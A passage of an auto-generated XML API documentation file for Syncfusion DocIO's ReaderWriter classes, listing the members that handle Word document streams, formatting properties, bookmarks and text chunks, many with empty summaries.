        <member name="M:Syncfusion.DocIO.ReaderWriter.HFStatePositions.UpdateHeaderEndPos(System.Int64,Syncfusion.DocIO.ReaderWriter.HeaderType)">
            <summary>
            
            </summary>
            <param name="iEndPos"></param>
            <param name="headerType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.HFStatePositions.IsEndOfSubdocItemText(System.Int64)">
            <summary>
            
            </summary>
            <param name="iPos"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.HFStatePositions.SectionIndex">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.AtnStatePositions">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AtnStatePositions.#ctor(Syncfusion.DocIO.ReaderWriter.WordFKPData)">
            <summary>
            Initializing constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AtnStatePositions.MoveToItem(System.Int32)">
            <summary>
            
            </summary>
            <param name="itemIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.AtnStatePositions.UpdateItemEndPos(System.Int64)">
            <summary>
            
            </summary>
            <param name="iEndPos"></param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.EndnoteStatePositions">
            <summary>
            Summary description for HFStatePositions
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.EndnoteStatePositions.#ctor(Syncfusion.DocIO.ReaderWriter.WordFKPData)">
            <summary>
            Initializing constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.EndnoteStatePositions.MoveToItem(System.Int32)">
            <summary>
            
            </summary>
            <param name="itemIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.EndnoteStatePositions.UpdateItemEndPos(System.Int64)">
            <summary>
            
            </summary>
            <param name="iEndPos"></param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.TextBoxStatePositions">
            <summary>
            Main doc textbox state position class
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.TextBoxStatePositions.#ctor(Syncfusion.DocIO.ReaderWriter.WordFKPData)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.TextBoxStatePositions"/> class.
            </summary>
            <param name="fkp"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.TextBoxStatePositions.MoveToItem(System.Int32)">
            <summary>
            
            </summary>
            <param name="itemIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.TextBoxStatePositions.UpdateItemEndPos(System.Int64)">
            <summary>
            
            </summary>
            <param name="iEndPos"></param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.HFTextBoxStatePositions">
            <summary>
            Header/footer textbox state position class
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.HFTextBoxStatePositions.#ctor(Syncfusion.DocIO.ReaderWriter.WordFKPData)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.TextBoxStatePositions"/> class.
            </summary>
            <param name="fkp"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.HFTextBoxStatePositions.MoveToItem(System.Int32)">
            <summary>
            Moves to text box.
            </summary>
            <param name="itemIndex">Index of the Text box.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.StreamsManager">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.StreamsManager.c_flagsDenyWrite">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.#ctor(System.String,System.Boolean)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.StreamsManager"/> class.
            </summary>
            <param name="fileName"> Name of the file. </param>
            <param name="createNewStorage"> True - create new storage,
            false - load existing storage. </param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.#ctor(System.IO.Stream,System.Boolean)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.StreamsManager"/> class.
            </summary>
            <param name="stream"> Name of the stream. </param>
            <param name="createNewStorage"> True - create new storage,
            false - load existing storage. </param>
        </member>
        <!-- Badly formed XML comment ignored for member "M:Syncfusion.DocIO.ReaderWriter.StreamsManager.LoadStg(System.String)" -->
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.LoadStg(System.IO.Stream)">
            <summary>
            Loads the STG from stream
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.LoadTableStream(System.String)">
            <summary>
            Loads the table stream.
            </summary>
            <param name="tableStreamName"> Table stream name </param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.LoadSummaryInfoStream">
            <summary>
            Loads the SummaryInformation stream
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.LoadDocumentSummaryInfoStream">
            <summary>
            Loads the DocumentSummaryInformation stream
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.UpdateStreams(System.IO.MemoryStream,System.IO.MemoryStream,System.IO.MemoryStream)">
            <summary>
            Refreshs main and table streams data
            </summary>
            <param name="mainStream"> main stream from which to refresh current main stream </param>
            <param name="tableStream"> table stream from which to refresh current table stream </param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.WriteSubStorage(System.IO.MemoryStream,System.String)">
            <summary>
            Writes the sub storage.
            </summary>
            <param name="stream"> The stream </param>
            <param name="storageName"> Name of the storage. </param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.SaveStg(System.Collections.Generic.Dictionary{System.String,Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage})">
            <summary>
            Saves storages data and closes streams
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.CloseStg">
            <summary>
             Closes all streams and binary readers/writers
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.SaveStream(System.String,System.IO.MemoryStream)">
            <summary>
            Saves the stream.
            </summary>
            <param name="name"> The stream name. </param>
            <param name="stream"> The stream. </param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.SaveCompObjStream">
            <summary>
            Saves the stream.
            </summary>
            <param name="name"> The stream name. </param>
            <param name="stream"> The stream. </param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.InitStreams">
            <summary>
            Initialize the streams and writers.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.LoadStreams">
            <summary>
            Loads main, data, macros and object pool streams data
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.LoadStreamFromCompound(System.String)">
            <summary>
            Loads the stream from compound file.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.LoadSubStorage(System.String)">
            <summary>
            Loads the sub storage.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.ReadSubStorage(System.String)">
            <summary>
            Reads some sub storage from the main storage of the document
              into the memory stream
            </summary>
            <param name="stgName"> sub storage name </param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.CopyStream(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="inputStream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.StreamsManager.LoadStreamFromStg(System.String)">
            <summary>
            Loads stream from storage into memory stream
            </summary>
            <param name="streamName"> the name of the stream </param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StreamsManager.Storage">
            <summary>
            Gets the storage.
            </summary>
            <value>The storage.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StreamsManager.MainStream">
            <summary>
            Gets main, table and data streams.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StreamsManager.MacrosStream">
            <summary>
            Gets macros and object pool streams
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StreamsManager.SummaryInfoStream">
            <summary>
            Gets or sets the SummaryInformation stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StreamsManager.DocumentSummaryInfoStream">
            <summary>
            Gets or Sets the DocumentSummaryInformation stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StreamsManager.SummaryInfoWriter">
            <summary>
            Gets or sets the SummaryInformation stream writer
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StreamsManager.DocumentSummaryInfoWriter">
            <summary>
            Gets or sets the DocumentSummaryInformation stream writer
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StreamsManager.SummaryInfoReader">
            <summary>
            Gets or sets the SummaryInformation stream reader
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StreamsManager.DocumentSummaryInfoReader">
            <summary>
            Gets or sets the DocumentSummaryInformation stream reader
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StreamsManager.MainWriter">
            <summary>
            Gets the main, table and data writers.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.StreamsManager.MainReader">
            <summary>
            Gets the main, table and data readers.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordFKPData">
            <summary>
            Summary description for WordFKPData.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordFKPData.DEF_COUNTRUN_SIZE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordFKPData.m_fib">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordFKPData.m_papxPositions">
            <summary>
            Fills objects by write operations.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordFKPData.m_chpxFKPs">
            <summary>
            Fills objects by read operation. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.#ctor(Syncfusion.DocIO.ReaderWriter.Fib,Syncfusion.DocIO.ReaderWriter.WPTablesData)">
            <summary>
            Member initializing constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.GetSepx(System.Int32)">
            <summary>
             Gets SectionPropertyException
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.AddChpxProperties(System.UInt32,Syncfusion.DocIO.ReaderWriter.Biff_Records.CharacterPropertyException)">
            <summary>
            Add character properties exception
            </summary>
            <param name="pos"></param>
            <param name="chpx"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.AddPapxProperties(System.UInt32,Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphExceptionInDiskPage,System.IO.MemoryStream)">
            <summary>
            Add paragraph properties exception
            </summary>
            <param name="pos"></param>
            <param name="papx"></param>
            <param name="dataStream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.AddSepxProperties(System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.SectionPropertyException)">
            <summary>
            Add section properties exception 
            </summary>
            <param name="pos"></param>
            <param name="sepx"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.Read(System.IO.MemoryStream)">
            <summary>
            Reads character/paragraph/section properties from stream
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.Write(System.IO.Stream)">
            <summary>
            Writes character/paragraph/section properties exceptions to stream
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.GetPapxPage(System.Int32)">
            <summary>
            Gets i-th page page with paragraph properties exception.
            </summary>
            <param name="i"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.GetChpxPage(System.Int32)">
            <summary>
            Gets i-th page page with character properties exception.
            </summary>
            <param name="i"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.CloneAndAddLastPapx(System.UInt32)">
            <summary>
            Rewrite last Papx to the document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.CloneAndAddLastChpx(System.UInt32)">
            <summary>
            Rewrite last chpx to the document.
            </summary>
            <param name="pos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.ReadFKPs(System.IO.MemoryStream,Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable)">
            <summary>
            Reads array of FKPs from stream according to BinaryTable
            </summary>
            <param name="stream"></param>
            <param name="table"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.WritePapx(System.IO.Stream)">
            <summary>
            Write all papxs to stream 
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.FillPapxPage(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage,System.UInt32,System.Int32)">
            <summary>
            Fill papx page with sprms
            </summary>
            <param name="page"></param>
            <param name="pagePos"></param>
            <param name="papxIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.GetPapxCountPerPage(System.Int32)">
            <summary>
            Gets count of sprms per one page
            </summary>
            <param name="papxIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.WriteChpx(System.IO.Stream)">
            <summary>
            Write all chpxs to stream
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.FillChpxPage(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.CharacterPropertiesPage,System.UInt32,System.Int32)">
            <summary>
            Fill chpx page with sprms
            </summary>
            <param name="page"></param>
            <param name="pagePos"></param>
            <param name="chpxIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.GetChpxCountPerPage(System.Int32)">
            <summary>
            Gets count of sprms per one page
            </summary>
            <param name="chpxIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.IsChpxRepeats(System.Int32,System.Int32)">
            <summary>
            Check whether Chpx repeats within the specified ranges (chpxIndex to CurrentIndex)
            </summary>
            <param name="chpxIndex">Chpx Index</param>
            <param name="CurrentIndex">Current Index</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.WriteSepx(System.IO.Stream)">
            <summary>
            Write all sepxs to stream
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordFKPData.AlignByDiskPage(System.IO.Stream)">
            <summary>
            Aligns position in stream to the end of the page
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordFKPData.Fib">
            <summary>
            Gets FIB of word file
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordFKPData.EndOfSepx">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordFKPData.SepxAddedCount">
            <summary>
            Gets number of added SectionPropertyExceptions
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordFKPData.Tables">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.NeedPasswordEventHandler">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordReader">
            <summary>
            Implemented of IWordReader interface.
            </summary>
            <remarks>
            IWordReader : interface for forward-only reading data from word file.
            </remarks>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordReaderBase">
            <summary>
            Base implementation for WordReader and WordSubdocumentReader classes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReaderBase.m_streamsManager">
            <summary>
            Used to convert managed memory block (byte array)
            into managed object
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReaderBase.m_docInfo">
            <summary>
            DocInfo contains stream component data blocks.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReaderBase.m_currStyleIndex">
            <summary>
            The index of style, applied to current text chunk.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReaderBase.m_statePositions">
            <summary>
            Saves all needed positions in stream for current reader
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordReaderBase.m_characterProps">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.#ctor(Syncfusion.DocIO.ReaderWriter.StreamsManager)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WordReaderBase"/> class.
            </summary>
            <param name="streamsManager">The streams manager.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.#ctor">
            <summary>
            Hide default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.ReadChunk">
            <summary>
            Read next elementary text string*.
            </summary>
            <remarks>
            * - "elementary text string" - string, in which all symbols have the 
            identical character/paragraph/section properties.
            </remarks>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.GetImageReader(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Get interface for reading images from word file
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.GetFSPA">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.GetDrawingObject">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.GetFormField(Syncfusion.DocIO.FieldType)">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.GetFld">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.ReadWatermark(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
            <param name="doc"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.GetBookmarks">
            <summary>
            Get array of Bookmarks from doc file.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.SubdocumentExist">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.FreezeStreamPos">
            <summary>
            Saved publicy current stream position.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.UnfreezeStreamPos">
            <summary>
            If stream position has been saved - restore it.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.HasList">
            <summary>
            Determines whether this instance has list.
            </summary>
            <returns>
            <c>true</c> if this instance has list; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.RestoreBookmark">
            <summary>
            Restores bookmark.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.UpdateBookmarks">
            <summary>
            Updates the bookmarks.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.InitClass">
            <summary>
            Class initialization.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.GetChunkEndPosition(System.Int64)">
            <summary>
            Gets text chunk end position.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.UpdateEndPositions(System.Int64)">
            <summary>
            Updates end position of current chpx/papx
            </summary>
            <param name="iEndPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.UpdateChunkType">
            <summary>
            Analizing type of text chunk.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.UpdateCharacterProperties">
            <summary>
            Updates character properties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.UpdateParagraphProperties">
            <summary>
            Updates paragraph properties
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.ReadChunkString(System.Int32)">
            <summary>
            Reads string from stream using current encoding.
            </summary>
            <param name="length"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CalcCP(System.Int32,System.Int32)">
            <summary>
            Calculates the CP depending on specified startPos and length
            </summary>
            <param name="startPos"></param>
            <param name="length"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.IsWatermark(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            
            </summary>
            <param name="spContainer"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.ReadTextBoxProps(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress)">
            <summary>
            
            </summary>
            <param name="spContainer"></param>
            <param name="fspa"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.ReadPictureProps(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress)">
            <summary>
            
            </summary>
            <param name="spContainer"></param>
            <param name="fspa"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.ReadTextWatermark(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
            <param name="spContainer"></param>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.ReadPictureWatermark(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress)">
            <summary>
            
            </summary>
            <param name="spContainer"></param>
            <param name="doc"></param>
            <param name="fspa"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.ApplyShapeProperties(Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtTertiaryFOPT)">
            <summary>
            Apply shape properties to the watermark picture
            </summary>
            <param name="picture"></param>
            <param name="fspa"></param>
            <param name="shapePosition"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.InitBaseShapeProps(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeBase,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            Initialize base shape properties.
            </summary>
            <param name="fspa"></param>
            <param name="shape"></param>
            <param name="container"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.InitTextBoxProps(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.TextBoxShape,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            Read textbox properties from SpContainer.
            </summary>
            <param name="shape"></param>
            <param name="container"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.InitPictureProps(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.PictureShape,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            
            </summary>
            <param name="pictShape"></param>
            <param name="spContainer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.ReadAndParseTextChunk(System.Int32)">
            <summary>
            Read and parse text chunk.
            <remark>If text chunk consists special symbols - it is splitted.</remark>
            </summary>
             <param name="iLength"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CheckSpecCharacters(System.Int32)">
            <summary>
            Checks id chunk includes special characters.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.IsZeroChunk">
            <summary>
            Defines if current chunk is "Zero" chunk. 
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CalculateChunkLength">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.IsNextItem">
            <summary>
            Checks if current body belongs to next paragraph item.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.GetFldChunkLen(System.Int32,System.Int32)">
            <summary>
            Counts minimal chunk length with field.
            </summary>
            <param name="curPos"></param>
            <param name="endPos"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CheckCurTextChunk(System.Int32)">
            <summary>
            Checks the current text chunk.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CalculateBkmkChunkLen(System.Int32,System.Int32)">
            <summary>
            Get new chunk length according bookmark.
            </summary>
            <param name="startStreamPos"></param>
            <param name="endStreamPos"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.GetBookmarkChunkLen(System.Int64,System.Int64)">
            <summary>
            Gets the bookmark chunk len.
            </summary>
            <param name="curDocStreamPos">The cur doc stream pos.</param>
            <param name="endDocStreamPos">The end doc stream pos.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CheckTableBookmark(System.Int32,System.Int32)">
            <summary>
            Checks the table bookmark.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.SetCurrentBookmark(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="startPos"></param>
            <param name="endPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.DisableBookmark(System.Int32)">
            <summary>
            
            </summary>
            <param name="bookmarkIndex"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CheckAndGetCurChunkLen(System.Int32)">
            <summary>
            Checks if current chunk is FieldBeginChunk or FieldEndChunk, 
            return real length of current chunk.
            </summary>
            <param name="curChunkPosLen"></param>
            <returns>Current chunk length</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CheckForSymbols(System.Int32)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordReaderBase.GetDocVersion">
            <summary>
            Gets the document version.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CurrentStyleIndex">
            <summary>
            Gets index of current style .
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.StyleSheet">
            <summary>
            Gets document stylesheet.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.ChunkType">
            <summary>
            Gets type of current text chunk.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.TextChunk">
            <summary>
            Current read text chunk.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.CharacterProperties">
            <summary>
            Gets character properties for current text chunk.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.ParagraphProperties">
            <summary>
            Gets paragraph properties for current text chunk.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.ListInfo">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.HasTableBody">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.Escher">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.Fields">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordReaderBase.TablesData">
            <summary>
            Gets WPTablesData object.
            </summary>
        </member>
